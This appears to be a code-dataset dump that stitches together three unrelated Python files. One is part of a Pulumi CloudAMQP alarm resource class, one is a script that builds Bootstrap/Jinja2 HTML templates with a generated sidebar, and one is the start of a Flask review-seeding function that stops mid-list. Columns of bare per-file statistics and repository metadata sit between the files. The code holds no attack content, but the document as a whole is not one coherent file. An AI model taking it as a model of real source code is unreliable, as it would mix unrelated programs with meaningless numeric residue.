        :param pulumi.Input[str] queue_regex: Regex for which queue to check.
        :param pulumi.Input[Sequence[pulumi.Input[int]]] recipients: Identifier for recipient to be notified. Leave empty to notify all recipients.
        :param pulumi.Input[int] time_threshold: The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
        :param pulumi.Input[str] type: The alarm type, see valid options below.
        :param pulumi.Input[int] value_threshold: The value to trigger the alarm for.
        :param pulumi.Input[str] vhost_regex: Regex for which vhost to check.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: AlarmArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        This resource allows you to create and manage alarms to trigger based on a set of conditions. Once triggered a notification will be sent to the assigned recipients. When creating a new instance, there will also be a set of default alarms (cpu, memory and disk) created. All default alarms use the default recipient for notifications.
        By setting `no_default_alarms` to *true* in `Instance`, the instance is created without default alarms, avoiding the need to import them to get full control.
        Available for all subscription plans, but `lemur` and `tiger` are limited to fewer alarm types. The limited types supported can be seen in the table below in Alarm Type Reference.
        ## Alarm Type reference
        Valid options for notification type.
        Required arguments for all alarms: *instance_id*, *type* and *enabled*
        Optional argument for all alarms: *tags*, *queue_regex*, *vhost_regex*
        | Name | Type | Shared | Dedicated | Required arguments |
        | ---- | ---- | ---- | ---- | ---- |
        | CPU | cpu | - | ✔ | time_threshold, value_threshold |
        | Memory | memory | - | ✔ | time_threshold, value_threshold |
        | Disk space | disk | - | ✔ | time_threshold, value_threshold |
        | Queue | queue | ✔ | ✔ | time_threshold, value_threshold, queue_regex, vhost_regex, message_type |
        | Connection | connection | ✔ | ✔ | time_threshold, value_threshold |
        | Consumer | consumer | ✔ | ✔ | time_threshold, value_threshold, queue, vhost |
        | Netsplit | netsplit | - | ✔ | time_threshold |
        | Server unreachable | server_unreachable | - | ✔ | time_threshold |
        | Notice | notice | ✔ | ✔ | |
        ## Dependency
        This resource depends on CloudAMQP instance identifier, `cloudamqp_instance.instance.id`.
        ## Import
        `cloudamqp_alarm` can be imported using CloudAMQP internal identifier of the alarm together (CSV separated) with the instance identifier. To retrieve the alarm identifier, use [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html#list-alarms)
        ```sh
        $ pulumi import cloudamqp:index/alarm:Alarm alarm <id>,<instance_id>
        ```
        :param str resource_name: The name of the resource.
        :param AlarmArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads: an AlarmArgs bundle or loose kwargs.
        resource_args, opts = _utilities.get_resource_args_opts(AlarmArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       enabled: Optional[pulumi.Input[bool]] = None,
                       instance_id: Optional[pulumi.Input[int]] = None,
                       message_type: Optional[pulumi.Input[str]] = None,
                       queue_regex: Optional[pulumi.Input[str]] = None,
                       recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
                       time_threshold: Optional[pulumi.Input[int]] = None,
                       type: Optional[pulumi.Input[str]] = None,
                       value_threshold: Optional[pulumi.Input[int]] = None,
                       vhost_regex: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Normalize and validate resource options, defaulting the SDK version.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (no existing id): required properties
            # must be present unless we are rehydrating from an existing URN.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = AlarmArgs.__new__(AlarmArgs)
            if enabled is None and not opts.urn:
                raise TypeError("Missing required property 'enabled'")
            __props__.__dict__["enabled"] = enabled
            if instance_id is None and not opts.urn:
                raise TypeError("Missing required property 'instance_id'")
            __props__.__dict__["instance_id"] = instance_id
            __props__.__dict__["message_type"] = message_type
            __props__.__dict__["queue_regex"] = queue_regex
            if recipients is None and not opts.urn:
                raise TypeError("Missing required property 'recipients'")
            __props__.__dict__["recipients"] = recipients
            __props__.__dict__["time_threshold"] = time_threshold
            if type is None and not opts.urn:
                raise TypeError("Missing required property 'type'")
            __props__.__dict__["type"] = type
            __props__.__dict__["value_threshold"] = value_threshold
            __props__.__dict__["vhost_regex"] = vhost_regex
        super(Alarm, __self__).__init__(
            'cloudamqp:index/alarm:Alarm',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            enabled: Optional[pulumi.Input[bool]] = None,
            instance_id: Optional[pulumi.Input[int]] = None,
            message_type: Optional[pulumi.Input[str]] = None,
            queue_regex: Optional[pulumi.Input[str]] = None,
            recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
            time_threshold: Optional[pulumi.Input[int]] = None,
            type: Optional[pulumi.Input[str]] = None,
            value_threshold: Optional[pulumi.Input[int]] = None,
            vhost_regex: Optional[pulumi.Input[str]] = None) -> 'Alarm':
        """
        Get an existing Alarm resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] enabled: Enable or disable the alarm to trigger.
        :param pulumi.Input[int] instance_id: The CloudAMQP instance ID.
        :param pulumi.Input[str] message_type: Message type `(total, unacked, ready)` used by queue alarm type.
        :param pulumi.Input[str] queue_regex: Regex for which queue to check.
        :param pulumi.Input[Sequence[pulumi.Input[int]]] recipients: Identifier for recipient to be notified. Leave empty to notify all recipients.
        :param pulumi.Input[int] time_threshold: The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
        :param pulumi.Input[str] type: The alarm type, see valid options below.
        :param pulumi.Input[int] value_threshold: The value to trigger the alarm for.
        :param pulumi.Input[str] vhost_regex: Regex for which vhost to check.
        """
        # Force the lookup id into the options, then rehydrate state from kwargs.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _AlarmState.__new__(_AlarmState)
        __props__.__dict__["enabled"] = enabled
        __props__.__dict__["instance_id"] = instance_id
        __props__.__dict__["message_type"] = message_type
        __props__.__dict__["queue_regex"] = queue_regex
        __props__.__dict__["recipients"] = recipients
        __props__.__dict__["time_threshold"] = time_threshold
        __props__.__dict__["type"] = type
        __props__.__dict__["value_threshold"] = value_threshold
        __props__.__dict__["vhost_regex"] = vhost_regex
        return Alarm(resource_name, opts=opts, __props__=__props__)

    # Read-only output properties resolved by the Pulumi engine at deploy time.
    @property
    @pulumi.getter
    def enabled(self) -> pulumi.Output[bool]:
        """
        Enable or disable the alarm to trigger.
        """
        return pulumi.get(self, "enabled")
    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> pulumi.Output[int]:
        """
        The CloudAMQP instance ID.
        """
        return pulumi.get(self, "instance_id")
    @property
    @pulumi.getter(name="messageType")
    def message_type(self) -> pulumi.Output[Optional[str]]:
        """
        Message type `(total, unacked, ready)` used by queue alarm type.
        """
        return pulumi.get(self, "message_type")
    @property
    @pulumi.getter(name="queueRegex")
    def queue_regex(self) -> pulumi.Output[Optional[str]]:
        """
        Regex for which queue to check.
        """
        return pulumi.get(self, "queue_regex")
    @property
    @pulumi.getter
    def recipients(self) -> pulumi.Output[Sequence[int]]:
        """
        Identifier for recipient to be notified. Leave empty to notify all recipients.
        """
        return pulumi.get(self, "recipients")
    @property
    @pulumi.getter(name="timeThreshold")
    def time_threshold(self) -> pulumi.Output[Optional[int]]:
        """
        The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
        """
        return pulumi.get(self, "time_threshold")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        The alarm type, see valid options below.
        """
        return pulumi.get(self, "type")
    @property
    @pulumi.getter(name="valueThreshold")
    def value_threshold(self) -> pulumi.Output[Optional[int]]:
        """
        The value to trigger the alarm for.
        """
        return pulumi.get(self, "value_threshold")
    @property
    @pulumi.getter(name="vhostRegex")
    def vhost_regex(self) -> pulumi.Output[Optional[str]]:
        """
        Regex for which vhost to check.
        """
        return pulumi.get(self, "vhost_regex")
| 44.245819
| 341
| 0.640085
| 3,124
| 26,459
| 5.226312
| 0.075544
| 0.09028
| 0.080296
| 0.044466
| 0.898818
| 0.884486
| 0.8734
| 0.846879
| 0.841612
| 0.822074
| 0
| 0.006616
| 0.251635
| 26,459
| 597
| 342
| 44.319933
| 0.817938
| 0.369402
| 0
| 0.748447
| 1
| 0
| 0.092494
| 0.001776
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161491
| false
| 0.003106
| 0.015528
| 0
| 0.273292
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12b1dedc6dafc45cacda1d8048f1067b7e1f65f3
| 21,802
|
py
|
Python
|
templateBuilder.py
|
OrientoNubo/Folder-based-WebBuilder
|
8ca353c3b92f856272084a82be981f9094449a24
|
[
"MIT"
] | 3
|
2021-11-24T12:27:06.000Z
|
2022-02-18T15:36:04.000Z
|
templateBuilder.py
|
OrientoNubo/Folder-based-WebBuilder
|
8ca353c3b92f856272084a82be981f9094449a24
|
[
"MIT"
] | null | null | null |
templateBuilder.py
|
OrientoNubo/Folder-based-WebBuilder
|
8ca353c3b92f856272084a82be981f9094449a24
|
[
"MIT"
] | null | null | null |
#coding:utf-8
import os
from folderReader import traverseDIR
from bs4 import BeautifulSoup
# <li><a href="#" class="link-dark rounded">Pages Count: ?</a></li>
# print(src)
def htmlBuilderIndex():
    """Build the Jinja2 base template for top-level pages (./templates/template.html).

    Reads the content tree from ``traverseDIR()`` and assembles a Bootstrap
    page: stylesheet links, a nav header, a collapsible sidebar generated
    from the tree, a ``{% block content %}`` placeholder, a footer and the
    script includes.  As a side effect, an empty placeholder HTML file is
    created under ``./templates/menu/<section>/`` for every second-level
    page discovered.

    NOTE(review): the layout of ``src`` is inferred from usage only —
    src[1][0] = top-level sections, src[1][1] = "section/page" entries,
    src[2] = total file count.  Confirm against folderReader.traverseDIR.
    """
    src = traverseDIR()
    htmlSample = '''
    <!DOCTYPE html>
    <html>
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    </head>
    <style></style>
    <body></body>
    </html>
    '''
    soup = BeautifulSoup(htmlSample, 'html.parser')
    # Constitute::html:head -- stylesheet links and the title element.
    headSoup = soup.head
    tag = soup.new_tag("link", rel="stylesheet", href=".{{url_for('static', filename='css/bootstrap.min.css') }}")
    headSoup.append("")
    headSoup.append(tag)
    tag = soup.new_tag("link", rel="stylesheet", href=".{{url_for('static', filename='css/sidebars.css') }}")
    headSoup.append("\n")
    headSoup.append(tag)
    tag = soup.new_tag("title")
    headSoup.append("\n")
    headSoup.append(tag)
    headSoup.title.string = "{% block title %}{% endblock %} | SHARK"
    # Constitute:::html::body:header -- top navigation bar.
    headerSoup = soup.body
    header = '''<header class="d-flex justify-content-center py-3">
        <ul class="nav nav-pills">
            <li class="nav-item"><a href="./" class="nav-link active" aria-current="page">Home</a></li>
            <li class="nav-item"><a href="./posts.html" class="nav-link">Posts</a></li>
            <li class="nav-item"><a href="./caption.html" class="nav-link">Caption</a></li>
            <li class="nav-item"><a href="./links.html" class="nav-link">Links</a></li>
        </ul>
    </header>'''
    headerSoup.append(BeautifulSoup(header, 'html.parser'))
    # Constitute:::html::body:main -- container holding sidebar + content block.
    mainSoup = soup.body
    main_1 = ''' <div class="container">
        <div class="row">
            <div class="col-md-3" id="sidebar">
                <div class="flex-shrink-0 p-3 bg-white">
                    <a href="/" class="d-flex align-items-center pb-3 mb-3 link-dark text-decoration-none border-bottom">
                        <svg class="bi me-2" width="30" height="24"><use xlink:href="#bootstrap"></use>
                        <span class="fs-5 fw-semibold">　</span>
                    </a>'''
    # Sidebar: one collapsible <li> per top-level section, one link per page.
    main_2_sidebarVar = '<ul class="list-unstyled ps-0">'
    for item in src[1][0]:
        LEVEL_1 = item
        LEVEL_1_ID = item + "-collapse"
        LEVEL_1_ID_target = "#" + item + "-collapse"
        LEVEL_2 = ''
        for item2 in src[1][1]:
            item2_upper = item2.split("/")[0]
            item2_lower = item2.split("/")[1]
            if item2_upper == item:
                LEVEL_2 = LEVEL_2 + '''
                    <li><a href="./menu/''' + item2_upper + "/" + item2_lower + '''.html" class="link-dark rounded">
                        ''' + item2_lower + '''
                    </a></li>
                '''
                # Ensure the placeholder page for this entry exists on disk.
                ndPagePath = "./templates/menu/" + item2_upper
                os.makedirs(ndPagePath, exist_ok=True)
                ndPageURL = "./templates/menu/" + item2_upper + "/" + item2_lower + ".html"
                # BUG FIX: was `temp.close` (attribute access, never called);
                # touch the empty file and close the handle properly.
                open(ndPageURL, 'w').close()
        main_2_sidebarVar = main_2_sidebarVar + '''
        <li class="mb-1">
            <button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="''' + LEVEL_1_ID_target + '''" aria-expanded="false">
                ''' + LEVEL_1 + '''
            </button>
            <div class="collapse" id="''' + LEVEL_1_ID + '''">
                ''' + '''
                <ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
                ''' + LEVEL_2 + '''
                </ul>
            </div>
        </li>
        '''
    # Analyze line: static sidebar section showing the total file count.
    main_2_sidebarVar = main_2_sidebarVar + '''
        <li class="border-top my-3"></li>
        <li class="mb-1">
            <button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="#account-collapse" aria-expanded="false">
                Analyze
            </button>
            <div class="collapse" id="account-collapse">
                <ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
                    <li><a href="#" class="link-dark rounded">Files Count: ''' + str(src[2]) + '''</a></li>
                </ul>
            </div>
        </li>
    </ul>'''
    main_3 = '''    </div>
            </div>
            <div class="col-md" id="content">
                {% block content %}
                {% endblock %}
            </div>
        </div>
    </div>'''
    main = main_1 + main_2_sidebarVar + main_3
    mainSoup.append(BeautifulSoup(main, "html.parser"))
    # Constitute:::html::body:footer
    bodySoup = soup.body
    footer = '''<div id="footer">
        <div class="container">
            <footer class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top">
                <div class="col-md-12 d-flex align-items-center">
                    <span class="text-muted">© 2021 github.com/OrientoNubo/Folder-based-WebBuilder, repo</span>
                </div>
            </footer>
        </div>
    </div>'''
    bodySoup.append(BeautifulSoup(footer, 'html.parser'))
    # Script includes go last in <body>.
    js = '''
    <script src=".{{ url_for('static', filename='js/bootstrap.bundle.min.js') }}"></script>
    <script src=".{{ url_for('static', filename='js/sidebars.js') }}"></script>
    '''
    bodySoup.append(BeautifulSoup(js, 'html.parser'))
    # BUG FIX: was `template.close` (never called); a context manager
    # guarantees the template file is flushed and closed.
    with open("./templates/template.html", 'w') as template:
        template.write(soup.prettify())
def htmlBuilderPosts():
    """Build the Jinja2 base template for post pages (./templates/template_posts.html).

    Identical in structure to ``htmlBuilderIndex`` but every asset and nav
    href is prefixed with ``..`` because post pages live one level deeper.

    NOTE(review): the shape of ``src`` is inferred from usage only —
    src[1][0] = top-level sections, src[1][1] = "section/page" entries,
    src[2] = total file count.  Confirm against folderReader.traverseDIR.
    """
    src = traverseDIR()
    htmlSample = '''
    <!DOCTYPE html>
    <html>
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    </head>
    <style></style>
    <body></body>
    </html>
    '''
    soup = BeautifulSoup(htmlSample, 'html.parser')
    # Constitute::html:head -- stylesheet links and the title element.
    headSoup = soup.head
    tag = soup.new_tag("link", rel="stylesheet", href="..{{url_for('static', filename='css/bootstrap.min.css') }}")
    headSoup.append("")
    headSoup.append(tag)
    tag = soup.new_tag("link", rel="stylesheet", href="..{{url_for('static', filename='css/sidebars.css') }}")
    headSoup.append("\n")
    headSoup.append(tag)
    tag = soup.new_tag("title")
    headSoup.append("\n")
    headSoup.append(tag)
    headSoup.title.string = "{% block title %}{% endblock %} | SHARK"
    # Constitute:::html::body:header -- top navigation bar.
    headerSoup = soup.body
    header = '''<header class="d-flex justify-content-center py-3">
        <ul class="nav nav-pills">
            <li class="nav-item"><a href="../" class="nav-link active" aria-current="page">Home</a></li>
            <li class="nav-item"><a href="../posts.html" class="nav-link">Posts</a></li>
            <li class="nav-item"><a href="../caption.html" class="nav-link">Caption</a></li>
            <li class="nav-item"><a href="../links.html" class="nav-link">Links</a></li>
        </ul>
    </header>'''
    headerSoup.append(BeautifulSoup(header, 'html.parser'))
    # Constitute:::html::body:main -- container holding sidebar + content block.
    mainSoup = soup.body
    main_1 = ''' <div class="container">
        <div class="row">
            <div class="col-md-3" id="sidebar">
                <div class="flex-shrink-0 p-3 bg-white">
                    <a href="/" class="d-flex align-items-center pb-3 mb-3 link-dark text-decoration-none border-bottom">
                        <svg class="bi me-2" width="30" height="24"><use xlink:href="#bootstrap"></use>
                        <span class="fs-5 fw-semibold">　</span>
                    </a>'''
    # Sidebar: one collapsible <li> per top-level section, one link per page.
    main_2_sidebarVar = '<ul class="list-unstyled ps-0">'
    for item in src[1][0]:
        LEVEL_1 = item
        LEVEL_1_ID = item + "-collapse"
        LEVEL_1_ID_target = "#" + item + "-collapse"
        LEVEL_2 = ''
        for item2 in src[1][1]:
            item2_upper = item2.split("/")[0]
            item2_lower = item2.split("/")[1]
            if item2_upper == item:
                LEVEL_2 = LEVEL_2 + '''
                    <li><a href="../menu/''' + item2_upper + "/" + item2_lower + '''.html" class="link-dark rounded">
                        ''' + item2_lower + '''
                    </a></li>
                '''
                # NOTE(review): placeholders are created under ../templates
                # while the template itself is written under ./templates —
                # inconsistent with htmlBuilderIndex; confirm intent.
                ndPagePath = "../templates/menu/" + item2_upper
                os.makedirs(ndPagePath, exist_ok=True)
                ndPageURL = "../templates/menu/" + item2_upper + "/" + item2_lower + ".html"
                # BUG FIX: was `temp.close` (attribute access, never called);
                # touch the empty file and close the handle properly.
                open(ndPageURL, 'w').close()
        main_2_sidebarVar = main_2_sidebarVar + '''
        <li class="mb-1">
            <button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="''' + LEVEL_1_ID_target + '''" aria-expanded="false">
                ''' + LEVEL_1 + '''
            </button>
            <div class="collapse" id="''' + LEVEL_1_ID + '''">
                ''' + '''
                <ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
                ''' + LEVEL_2 + '''
                </ul>
            </div>
        </li>
        '''
    # Analyze line: static sidebar section showing the total file count.
    main_2_sidebarVar = main_2_sidebarVar + '''
        <li class="border-top my-3"></li>
        <li class="mb-1">
            <button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="#account-collapse" aria-expanded="false">
                Analyze
            </button>
            <div class="collapse" id="account-collapse">
                <ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
                    <li><a href="#" class="link-dark rounded">Files Count: ''' + str(src[2]) + '''</a></li>
                </ul>
            </div>
        </li>
    </ul>'''
    main_3 = '''    </div>
            </div>
            <div class="col-md" id="content">
                {% block content %}
                {% endblock %}
            </div>
        </div>
    </div>'''
    main = main_1 + main_2_sidebarVar + main_3
    mainSoup.append(BeautifulSoup(main, "html.parser"))
    # Constitute:::html::body:footer
    bodySoup = soup.body
    footer = '''<div id="footer">
        <div class="container">
            <footer class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top">
                <div class="col-md-12 d-flex align-items-center">
                    <span class="text-muted">© 2021 github.com/OrientoNubo/Folder-based-WebBuilder, repo</span>
                </div>
            </footer>
        </div>
    </div>'''
    bodySoup.append(BeautifulSoup(footer, 'html.parser'))
    # Script includes go last in <body>.
    js = '''
    <script src="..{{ url_for('static', filename='js/bootstrap.bundle.min.js') }}"></script>
    <script src="..{{ url_for('static', filename='js/sidebars.js') }}"></script>
    '''
    bodySoup.append(BeautifulSoup(js, 'html.parser'))
    # BUG FIX: was `template.close` (never called); a context manager
    # guarantees the template file is flushed and closed.
    with open("./templates/template_posts.html", 'w') as template:
        template.write(soup.prettify())
def htmlBuilderMenu():
    """Build the Jinja2 base template for menu pages (./templates/template_menu.html).

    Identical in structure to ``htmlBuilderIndex`` but every asset and nav
    href is prefixed with ``../..`` because menu pages live two levels deeper.

    NOTE(review): the shape of ``src`` is inferred from usage only —
    src[1][0] = top-level sections, src[1][1] = "section/page" entries,
    src[2] = total file count.  Confirm against folderReader.traverseDIR.
    """
    src = traverseDIR()
    htmlSample = '''
    <!DOCTYPE html>
    <html>
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    </head>
    <style></style>
    <body></body>
    </html>
    '''
    soup = BeautifulSoup(htmlSample, 'html.parser')
    # Constitute::html:head -- stylesheet links and the title element.
    headSoup = soup.head
    tag = soup.new_tag("link", rel="stylesheet", href="../..{{url_for('static', filename='css/bootstrap.min.css') }}")
    headSoup.append("")
    headSoup.append(tag)
    tag = soup.new_tag("link", rel="stylesheet", href="../..{{url_for('static', filename='css/sidebars.css') }}")
    headSoup.append("\n")
    headSoup.append(tag)
    tag = soup.new_tag("title")
    headSoup.append("\n")
    headSoup.append(tag)
    headSoup.title.string = "{% block title %}{% endblock %} | SHARK"
    # Constitute:::html::body:header -- top navigation bar.
    headerSoup = soup.body
    header = '''<header class="d-flex justify-content-center py-3">
        <ul class="nav nav-pills">
            <li class="nav-item"><a href="../../" class="nav-link active" aria-current="page">Home</a></li>
            <li class="nav-item"><a href="../../posts.html" class="nav-link">Posts</a></li>
            <li class="nav-item"><a href="../../caption.html" class="nav-link">Caption</a></li>
            <li class="nav-item"><a href="../../links.html" class="nav-link">Links</a></li>
        </ul>
    </header>'''
    headerSoup.append(BeautifulSoup(header, 'html.parser'))
    # Constitute:::html::body:main -- container holding sidebar + content block.
    mainSoup = soup.body
    main_1 = ''' <div class="container">
        <div class="row">
            <div class="col-md-3" id="sidebar">
                <div class="flex-shrink-0 p-3 bg-white">
                    <a href="/" class="d-flex align-items-center pb-3 mb-3 link-dark text-decoration-none border-bottom">
                        <svg class="bi me-2" width="30" height="24"><use xlink:href="#bootstrap"></use>
                        <span class="fs-5 fw-semibold">　</span>
                    </a>'''
    # Sidebar: one collapsible <li> per top-level section, one link per page.
    main_2_sidebarVar = '<ul class="list-unstyled ps-0">'
    for item in src[1][0]:
        LEVEL_1 = item
        LEVEL_1_ID = item + "-collapse"
        LEVEL_1_ID_target = "#" + item + "-collapse"
        LEVEL_2 = ''
        for item2 in src[1][1]:
            item2_upper = item2.split("/")[0]
            item2_lower = item2.split("/")[1]
            if item2_upper == item:
                LEVEL_2 = LEVEL_2 + '''
                    <li><a href="../../menu/''' + item2_upper + "/" + item2_lower + '''.html" class="link-dark rounded">
                        ''' + item2_lower + '''
                    </a></li>
                '''
                # NOTE(review): placeholders are created under ../../templates
                # while the template itself is written under ./templates —
                # inconsistent with htmlBuilderIndex; confirm intent.
                ndPagePath = "../../templates/menu/" + item2_upper
                os.makedirs(ndPagePath, exist_ok=True)
                ndPageURL = "../../templates/menu/" + item2_upper + "/" + item2_lower + ".html"
                # BUG FIX: was `temp.close` (attribute access, never called);
                # touch the empty file and close the handle properly.
                open(ndPageURL, 'w').close()
        main_2_sidebarVar = main_2_sidebarVar + '''
        <li class="mb-1">
            <button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="''' + LEVEL_1_ID_target + '''" aria-expanded="false">
                ''' + LEVEL_1 + '''
            </button>
            <div class="collapse" id="''' + LEVEL_1_ID + '''">
                ''' + '''
                <ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
                ''' + LEVEL_2 + '''
                </ul>
            </div>
        </li>
        '''
    # Analyze line: static sidebar section showing the total file count.
    main_2_sidebarVar = main_2_sidebarVar + '''
        <li class="border-top my-3"></li>
        <li class="mb-1">
            <button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="#account-collapse" aria-expanded="false">
                Analyze
            </button>
            <div class="collapse" id="account-collapse">
                <ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
                    <li><a href="#" class="link-dark rounded">Files Count: ''' + str(src[2]) + '''</a></li>
                </ul>
            </div>
        </li>
    </ul>'''
    main_3 = '''    </div>
            </div>
            <div class="col-md" id="content">
                {% block content %}
                {% endblock %}
            </div>
        </div>
    </div>'''
    main = main_1 + main_2_sidebarVar + main_3
    mainSoup.append(BeautifulSoup(main, "html.parser"))
    # Constitute:::html::body:footer
    bodySoup = soup.body
    footer = '''<div id="footer">
        <div class="container">
            <footer class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top">
                <div class="col-md-12 d-flex align-items-center">
                    <span class="text-muted">© 2021 github.com/OrientoNubo/Folder-based-WebBuilder, repo</span>
                </div>
            </footer>
        </div>
    </div>'''
    bodySoup.append(BeautifulSoup(footer, 'html.parser'))
    # Script includes go last in <body>.
    js = '''
    <script src="../..{{ url_for('static', filename='js/bootstrap.bundle.min.js') }}"></script>
    <script src="../..{{ url_for('static', filename='js/sidebars.js') }}"></script>
    '''
    bodySoup.append(BeautifulSoup(js, 'html.parser'))
    # BUG FIX: was `template.close` (never called); a context manager
    # guarantees the template file is flushed and closed.
    with open("./templates/template_menu.html", 'w') as template:
        template.write(soup.prettify())
# Script entry point: regenerate every template in order — the index page,
# the per-post pages, then the menu/sidebar template.
if __name__ == '__main__':
    htmlBuilderIndex()
    htmlBuilderPosts()
    htmlBuilderMenu()
| 42.007707
| 203
| 0.447298
| 2,122
| 21,802
| 4.511781
| 0.088596
| 0.022561
| 0.042302
| 0.029768
| 0.977648
| 0.977648
| 0.977648
| 0.974828
| 0.970336
| 0.960727
| 0
| 0.016851
| 0.39845
| 21,802
| 518
| 204
| 42.088803
| 0.712924
| 0.064581
| 0
| 0.87766
| 0
| 0.087766
| 0.667881
| 0.104209
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007979
| false
| 0
| 0.007979
| 0
| 0.015957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12b8476286d00259d739dd40e2972e3e8252bad7
| 69,661
|
py
|
Python
|
app/seeds/reviews.py
|
nikhilmenon2/Learn2Cook
|
8276c8d42e1476f32916952b105fa434d4c9abcc
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | 11
|
2021-02-26T19:11:31.000Z
|
2021-03-24T19:23:05.000Z
|
app/seeds/reviews.py
|
nikhilmenon2/Learn2Cook
|
8276c8d42e1476f32916952b105fa434d4c9abcc
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | null | null | null |
app/seeds/reviews.py
|
nikhilmenon2/Learn2Cook
|
8276c8d42e1476f32916952b105fa434d4c9abcc
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | null | null | null |
from app.models import db, Review
# Seeds the reviews table with demo data; add more rows here if you want.
def seed_reviews():
    """Bulk-insert the demo review rows.

    Every row carries the same four fields, so the data is kept as a compact
    (overall, review, recipeId, userId) tuple table built from a small set of
    canned review blurbs, and expanded into mappings at insert time.
    """
    # The canned review texts reused across the demo rows.
    master = "I have to keep trying to master this dish!"
    genius = "Whoever Wrote this is a genius!"
    family = "My family loved this!"
    great = "This was totally great!"
    treasure = "I will always treasure this recipe"
    awesome = "Awesome!"
    loved = "I loved this"
    never = "Never tried this type of food before"
    wrong = "If you dont like this there is something wrong with you!"
    easy = "I followed along so easily!"

    # (overall, review, recipeId, userId) for each demo review, in insert order.
    rows = [
        (5, master, 33, 4), (4, genius, 26, 10), (4, master, 33, 4), (4, family, 26, 10),
        (4, genius, 14, 9), (4, great, 28, 5), (4, great, 41, 3), (5, treasure, 38, 7),
        (3, family, 14, 3), (4, great, 23, 10), (5, master, 1, 9), (4, awesome, 33, 4),
        (5, loved, 49, 4), (3, never, 22, 4), (4, loved, 44, 8), (3, awesome, 31, 8),
        (5, loved, 16, 3), (5, awesome, 1, 6), (5, wrong, 3, 8), (4, genius, 5, 9),
        (5, great, 7, 6), (4, never, 38, 6), (3, easy, 19, 7), (5, great, 45, 3),
        (4, easy, 16, 7), (4, never, 12, 8), (3, awesome, 26, 3), (5, wrong, 8, 9),
        (5, never, 26, 7), (4, genius, 22, 8), (3, master, 43, 4), (5, never, 9, 7),
        (5, treasure, 21, 8), (4, loved, 48, 4), (4, great, 36, 3), (5, awesome, 35, 5),
        (5, master, 44, 4), (3, wrong, 43, 5), (4, never, 2, 7), (5, great, 9, 7),
        (4, easy, 40, 7), (5, genius, 32, 6), (4, loved, 9, 10), (4, family, 28, 9),
        (5, awesome, 12, 3), (3, wrong, 32, 5), (4, loved, 7, 3), (5, treasure, 8, 8),
        (4, treasure, 21, 3), (5, loved, 42, 8), (3, wrong, 27, 8), (5, awesome, 16, 10),
        (5, treasure, 33, 7), (4, treasure, 47, 10), (3, master, 50, 9), (3, loved, 38, 9),
        (4, treasure, 23, 7), (4, never, 11, 3), (5, never, 49, 4), (4, easy, 29, 10),
